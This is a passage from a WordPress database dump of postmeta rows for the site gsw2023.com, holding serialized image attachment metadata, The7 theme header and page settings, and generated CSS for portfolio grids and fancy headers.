.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(13194,2724,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:115;s:6:\"height\";i:133;s:4:\"file\";s:8:\"w104.jpg\";}}'),
(13195,2722,'_wp_attachment_backup_sizes','a:3:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:265;s:6:\"height\";i:327;s:4:\"file\";s:8:\"w103.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:16:\"w103-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5175;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:16:\"w103-243x300.jpg\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10991;}}'),
(13196,2720,'_wp_attachment_backup_sizes','a:3:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:478;s:6:\"height\";i:663;s:4:\"file\";s:8:\"w102.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:16:\"w102-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5166;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:16:\"w102-216x300.jpg\";s:5:\"width\";i:216;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10343;}}'),
(13197,2718,'_wp_attachment_backup_sizes','a:3:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:634;s:6:\"height\";i:703;s:4:\"file\";s:8:\"w101.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:16:\"w101-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4314;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:16:\"w101-271x300.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10073;}}'),
(13198,2708,'dt-img-hide-title','0'),
(13199,2706,'dt-img-hide-title','0'),
(13200,2538,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:115;s:6:\"height\";i:151;s:4:\"file\";s:7:\"2-4.jpg\";}}'),
(13201,2789,'_wp_attached_file','2022/10/3-4.jpg'),
(13202,2789,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:300;s:4:\"file\";s:15:\"2022/10/3-4.jpg\";s:8:\"filesize\";i:52933;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"3-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4992;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13203,2790,'_wp_attached_file','2022/10/3-5-e1675926184462.jpg'),
(13204,2790,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:164;s:6:\"height\";i:234;s:4:\"file\";s:30:\"2022/10/3-5-e1675926184462.jpg\";s:8:\"filesize\";i:49528;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"3-5-e1675926184462-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4993;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13205,2791,'_edit_lock','1675606236:1'),
(13206,2792,'_wp_attached_file','2022/10/m1.jpg'),
(13207,2792,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:601;s:6:\"height\";i:332;s:4:\"file\";s:14:\"2022/10/m1.jpg\";s:8:\"filesize\";i:171253;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"m1-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12746;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"m1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6159;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13208,2791,'_edit_last','1'),
(13209,2791,'_wpb_vc_js_status','true'),
(13210,2791,'_dt_sidebar_position','disabled'),
(13211,2791,'_dt_sidebar_widgetarea_id','sidebar_1'),
(13212,2791,'_dt_sidebar_hide_on_mobile','0'),
(13213,2791,'_dt_footer_show','1'),
(13214,2791,'_dt_footer_widgetarea_id','sidebar_2'),
(13215,2791,'_dt_footer_hide_on_mobile','0'),
(13216,2791,'_dt_header_title','fancy'),
(13217,2791,'_dt_header_background','normal'),
(13218,2791,'_dt_header_background_below_slideshow','disabled'),
(13219,2791,'_dt_header_transparent_bg_color_scheme','light'),
(13220,2791,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(13221,2791,'_dt_header_transparent_top_bar_bg_opacity','25'),
(13222,2791,'_dt_header_transparent_bg_color','#000000'),
(13223,2791,'_dt_header_transparent_bg_opacity','50'),
(13224,2791,'_dt_header_disabled_background','normal'),
(13225,2791,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(13226,2791,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(13227,2791,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(13228,2791,'_dt_header_disabled_transparent_bg_color','#000000'),
(13229,2791,'_dt_header_disabled_transparent_bg_opacity','50'),
(13230,2791,'_dt_page_overrides_top_margin',''),
(13231,2791,'_dt_page_overrides_right_margin',''),
(13232,2791,'_dt_page_overrides_bottom_margin',''),
(13233,2791,'_dt_page_overrides_left_margin',''),
(13234,2791,'_dt_mobile_page_padding_top',''),
(13235,2791,'_dt_mobile_page_padding_right',''),
(13236,2791,'_dt_mobile_page_padding_bottom',''),
(13237,2791,'_dt_mobile_page_padding_left',''),
(13238,2791,'_dt_fancy_header_layout_heading',''),
(13239,2791,'_dt_fancy_header_title_aligment','center'),
(13240,2791,'_dt_fancy_header_height','300'),
(13241,2791,'_dt_fancy_header_padding-top','0px'),
(13242,2791,'_dt_fancy_header_padding-bottom','0px'),
(13243,2791,'_dt_fancy_header_breadcrumbs_heading',''),
(13244,2791,'_dt_fancy_header_breadcrumbs','disabled'),
(13245,2791,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(13246,2791,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(13247,2791,'_dt_fancy_header_title_heading',''),
(13248,2791,'_dt_fancy_header_title_mode','custom'),
(13249,2791,'_dt_fancy_header_title',''),
(13250,2791,'_dt_fancy_header_title_font_size','30'),
(13251,2791,'_dt_fancy_header_title_line_height','36'),
(13252,2791,'_dt_fancy_header_text_transform','none'),
(13253,2791,'_dt_fancy_header_title_color_mode','color'),
(13254,2791,'_dt_fancy_header_title_color','#0d6cbf'),
(13255,2791,'_dt_fancy_header_subtitle_heading',''),
(13256,2791,'_dt_fancy_header_subtitle',''),
(13257,2791,'_dt_fancy_header_subtitle_font_size','18'),
(13258,2791,'_dt_fancy_header_subtitle_line_height','26'),
(13259,2791,'_dt_fancy_header_subtitle_text_transform','none'),
(13260,2791,'_dt_fancy_header_subtitle_color_mode','color'),
(13261,2791,'_dt_fancy_header_subtitle_color','#ffffff'),
(13262,2791,'_dt_fancy_header_bg_heading',''),
(13263,2791,'_dt_fancy_header_bg_color','#222222'),
(13264,2791,'_dt_fancy_header_bg_image_origin','featured_image'),
(13265,2791,'_dt_fancy_header_bg_image','a:0:{}'),
(13266,2791,'_dt_fancy_header_bg_repeat','no-repeat'),
(13267,2791,'_dt_fancy_header_bg_position_x','center'),
(13268,2791,'_dt_fancy_header_bg_position_y','center'),
(13269,2791,'_dt_fancy_header_bg_fullscreen','1'),
(13270,2791,'_dt_fancy_header_bg_overlay','0'),
(13271,2791,'_dt_fancy_header_overlay_color','#000'),
(13272,2791,'_dt_fancy_header_bg_overlay_opacity','50'),
(13273,2791,'_dt_fancy_header_scroll_effect','default'),
(13274,2791,'_dt_fancy_header_bg_parallax','0.5'),
(13275,2791,'_dt_fancy_header_responsiveness_heading',''),
(13276,2791,'_dt_fancy_header_responsiveness','enabled'),
(13277,2791,'_dt_fancy_header_responsiveness_switch','778px'),
(13278,2791,'_dt_fancy_header_responsive_height','70'),
(13279,2791,'_dt_fancy_header_responsive_font_size','30'),
(13280,2791,'_dt_fancy_header_responsive_title_line_height','38'),
(13281,2791,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(13282,2791,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(13283,2791,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(13284,2791,'_dt_project_options_back_button',''),
(13285,2791,'_dt_project_options_show_link',''),
(13286,2791,'_dt_project_options_link',''),
(13287,2791,'_dt_project_options_link_target',''),
(13288,2791,'_dt_project_options_link_name',''),
(13289,2791,'_dt_project_options_hide_thumbnail','1'),
(13290,2791,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(13291,2791,'_dt_project_options_related_mode','same'),
(13292,2791,'_dt_project_options_preview','normal'),
(13293,2791,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/m1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #0d6cbf;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(13294,2791,'_thumbnail_id','2792'),
(13296,2795,'_edit_lock','1675606345:1'),
(13297,2796,'_wp_attached_file','2022/10/m1-1.jpg'),
(13298,2796,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:266;s:4:\"file\";s:16:\"2022/10/m1-1.jpg\";s:8:\"filesize\";i:125310;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"m1-1-300x133.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11495;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6265;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13299,2795,'_edit_last','1'),
(13300,2795,'_wpb_vc_js_status','true'),
(13301,2795,'_dt_sidebar_position','disabled'),
(13302,2795,'_dt_sidebar_widgetarea_id','sidebar_1'),
(13303,2795,'_dt_sidebar_hide_on_mobile','0'),
(13304,2795,'_dt_footer_show','1'),
(13305,2795,'_dt_footer_widgetarea_id','sidebar_2'),
(13306,2795,'_dt_footer_hide_on_mobile','0'),
(13307,2795,'_dt_header_title','fancy'),
(13308,2795,'_dt_header_background','normal'),
(13309,2795,'_dt_header_background_below_slideshow','disabled'),
(13310,2795,'_dt_header_transparent_bg_color_scheme','light'),
(13311,2795,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(13312,2795,'_dt_header_transparent_top_bar_bg_opacity','25'),
(13313,2795,'_dt_header_transparent_bg_color','#000000'),
(13314,2795,'_dt_header_transparent_bg_opacity','50'),
(13315,2795,'_dt_header_disabled_background','normal'),
(13316,2795,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(13317,2795,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(13318,2795,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(13319,2795,'_dt_header_disabled_transparent_bg_color','#000000'),
(13320,2795,'_dt_header_disabled_transparent_bg_opacity','50'),
(13321,2795,'_dt_page_overrides_top_margin',''),
(13322,2795,'_dt_page_overrides_right_margin',''),
(13323,2795,'_dt_page_overrides_bottom_margin',''),
(13324,2795,'_dt_page_overrides_left_margin',''),
(13325,2795,'_dt_mobile_page_padding_top',''),
(13326,2795,'_dt_mobile_page_padding_right',''),
(13327,2795,'_dt_mobile_page_padding_bottom',''),
(13328,2795,'_dt_mobile_page_padding_left',''),
(13329,2795,'_dt_fancy_header_layout_heading',''),
(13330,2795,'_dt_fancy_header_title_aligment','center'),
(13331,2795,'_dt_fancy_header_height','300'),
(13332,2795,'_dt_fancy_header_padding-top','0px'),
(13333,2795,'_dt_fancy_header_padding-bottom','0px'),
(13334,2795,'_dt_fancy_header_breadcrumbs_heading',''),
(13335,2795,'_dt_fancy_header_breadcrumbs','disabled'),
(13336,2795,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(13337,2795,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(13338,2795,'_dt_fancy_header_title_heading',''),
(13339,2795,'_dt_fancy_header_title_mode','custom'),
(13340,2795,'_dt_fancy_header_title',''),
(13341,2795,'_dt_fancy_header_title_font_size','30'),
(13342,2795,'_dt_fancy_header_title_line_height','36'),
(13343,2795,'_dt_fancy_header_text_transform','none'),
(13344,2795,'_dt_fancy_header_title_color_mode','color'),
(13345,2795,'_dt_fancy_header_title_color','#ffffff'),
(13346,2795,'_dt_fancy_header_subtitle_heading',''),
(13347,2795,'_dt_fancy_header_subtitle',''),
(13348,2795,'_dt_fancy_header_subtitle_font_size','18'),
(13349,2795,'_dt_fancy_header_subtitle_line_height','26'),
(13350,2795,'_dt_fancy_header_subtitle_text_transform','none'),
(13351,2795,'_dt_fancy_header_subtitle_color_mode','color'),
(13352,2795,'_dt_fancy_header_subtitle_color','#ffffff'),
(13353,2795,'_dt_fancy_header_bg_heading',''),
(13354,2795,'_dt_fancy_header_bg_color','#222222'),
(13355,2795,'_dt_fancy_header_bg_image_origin','featured_image'),
(13356,2795,'_dt_fancy_header_bg_image','a:0:{}'),
(13357,2795,'_dt_fancy_header_bg_repeat','no-repeat'),
(13358,2795,'_dt_fancy_header_bg_position_x','center'),
(13359,2795,'_dt_fancy_header_bg_position_y','center'),
(13360,2795,'_dt_fancy_header_bg_fullscreen','1'),
(13361,2795,'_dt_fancy_header_bg_overlay','0'),
(13362,2795,'_dt_fancy_header_overlay_color','#000'),
(13363,2795,'_dt_fancy_header_bg_overlay_opacity','50'),
(13364,2795,'_dt_fancy_header_scroll_effect','default'),
(13365,2795,'_dt_fancy_header_bg_parallax','0.5'),
(13366,2795,'_dt_fancy_header_responsiveness_heading',''),
(13367,2795,'_dt_fancy_header_responsiveness','enabled'),
(13368,2795,'_dt_fancy_header_responsiveness_switch','778px'),
(13369,2795,'_dt_fancy_header_responsive_height','70'),
(13370,2795,'_dt_fancy_header_responsive_font_size','30'),
(13371,2795,'_dt_fancy_header_responsive_title_line_height','38'),
(13372,2795,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(13373,2795,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(13374,2795,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(13375,2795,'_dt_project_options_back_button',''),
(13376,2795,'_dt_project_options_show_link',''),
(13377,2795,'_dt_project_options_link',''),
(13378,2795,'_dt_project_options_link_target',''),
(13379,2795,'_dt_project_options_link_name',''),
(13380,2795,'_dt_project_options_hide_thumbnail','1'),
(13381,2795,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(13382,2795,'_dt_project_options_related_mode','same'),
(13383,2795,'_dt_project_options_preview','normal'),
(13384,2795,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/m1-1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(13385,2795,'_thumbnail_id','2796'),
(13386,2798,'_edit_lock','1675606588:1'),
(13387,2799,'_wp_attached_file','2022/10/m1-2.jpg'),
(13388,2799,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:376;s:6:\"height\";i:190;s:4:\"file\";s:16:\"2022/10/m1-2.jpg\";s:8:\"filesize\";i:94085;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"m1-2-300x152.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15018;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m1-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7662;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13389,2798,'_edit_last','1'),
(13390,2798,'_wpb_vc_js_status','true'),
(13391,2798,'_dt_sidebar_position','disabled'),
(13392,2798,'_dt_sidebar_widgetarea_id','sidebar_1'),
(13393,2798,'_dt_sidebar_hide_on_mobile','0'),
(13394,2798,'_dt_footer_show','1'),
(13395,2798,'_dt_footer_widgetarea_id','sidebar_2'),
(13396,2798,'_dt_footer_hide_on_mobile','0'),
(13397,2798,'_dt_header_title','fancy'),
(13398,2798,'_dt_header_background','normal'),
(13399,2798,'_dt_header_background_below_slideshow','disabled'),
(13400,2798,'_dt_header_transparent_bg_color_scheme','light'),
(13401,2798,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(13402,2798,'_dt_header_transparent_top_bar_bg_opacity','25'),
(13403,2798,'_dt_header_transparent_bg_color','#000000'),
(13404,2798,'_dt_header_transparent_bg_opacity','50'),
(13405,2798,'_dt_header_disabled_background','normal'),
(13406,2798,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(13407,2798,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(13408,2798,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(13409,2798,'_dt_header_disabled_transparent_bg_color','#000000'),
(13410,2798,'_dt_header_disabled_transparent_bg_opacity','50'),
(13411,2798,'_dt_page_overrides_top_margin',''),
(13412,2798,'_dt_page_overrides_right_margin',''),
(13413,2798,'_dt_page_overrides_bottom_margin',''),
(13414,2798,'_dt_page_overrides_left_margin',''),
(13415,2798,'_dt_mobile_page_padding_top',''),
(13416,2798,'_dt_mobile_page_padding_right',''),
(13417,2798,'_dt_mobile_page_padding_bottom',''),
(13418,2798,'_dt_mobile_page_padding_left',''),
(13419,2798,'_dt_fancy_header_layout_heading',''),
(13420,2798,'_dt_fancy_header_title_aligment','center'),
(13421,2798,'_dt_fancy_header_height','300'),
(13422,2798,'_dt_fancy_header_padding-top','0px'),
(13423,2798,'_dt_fancy_header_padding-bottom','0px'),
(13424,2798,'_dt_fancy_header_breadcrumbs_heading',''),
(13425,2798,'_dt_fancy_header_breadcrumbs','disabled'),
(13426,2798,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(13427,2798,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(13428,2798,'_dt_fancy_header_title_heading',''),
(13429,2798,'_dt_fancy_header_title_mode','custom'),
(13430,2798,'_dt_fancy_header_title',''),
(13431,2798,'_dt_fancy_header_title_font_size','30'),
(13432,2798,'_dt_fancy_header_title_line_height','36'),
(13433,2798,'_dt_fancy_header_text_transform','none'),
(13434,2798,'_dt_fancy_header_title_color_mode','color'),
(13435,2798,'_dt_fancy_header_title_color','#ffffff'),
(13436,2798,'_dt_fancy_header_subtitle_heading',''),
(13437,2798,'_dt_fancy_header_subtitle',''),
(13438,2798,'_dt_fancy_header_subtitle_font_size','18'),
(13439,2798,'_dt_fancy_header_subtitle_line_height','26'),
(13440,2798,'_dt_fancy_header_subtitle_text_transform','none'),
(13441,2798,'_dt_fancy_header_subtitle_color_mode','color'),
(13442,2798,'_dt_fancy_header_subtitle_color','#ffffff'),
(13443,2798,'_dt_fancy_header_bg_heading',''),
(13444,2798,'_dt_fancy_header_bg_color','#222222'),
(13445,2798,'_dt_fancy_header_bg_image_origin','featured_image'),
(13446,2798,'_dt_fancy_header_bg_image','a:0:{}'),
(13447,2798,'_dt_fancy_header_bg_repeat','no-repeat'),
(13448,2798,'_dt_fancy_header_bg_position_x','center'),
(13449,2798,'_dt_fancy_header_bg_position_y','center'),
(13450,2798,'_dt_fancy_header_bg_fullscreen','1'),
(13451,2798,'_dt_fancy_header_bg_overlay','0'),
(13452,2798,'_dt_fancy_header_overlay_color','#000'),
(13453,2798,'_dt_fancy_header_bg_overlay_opacity','50'),
(13454,2798,'_dt_fancy_header_scroll_effect','default'),
(13455,2798,'_dt_fancy_header_bg_parallax','0.5'),
(13456,2798,'_dt_fancy_header_responsiveness_heading',''),
(13457,2798,'_dt_fancy_header_responsiveness','enabled'),
(13458,2798,'_dt_fancy_header_responsiveness_switch','778px'),
(13459,2798,'_dt_fancy_header_responsive_height','70'),
(13460,2798,'_dt_fancy_header_responsive_font_size','30'),
(13461,2798,'_dt_fancy_header_responsive_title_line_height','38'),
(13462,2798,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(13463,2798,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(13464,2798,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(13465,2798,'_dt_project_options_back_button',''),
(13466,2798,'_dt_project_options_show_link',''),
(13467,2798,'_dt_project_options_link',''),
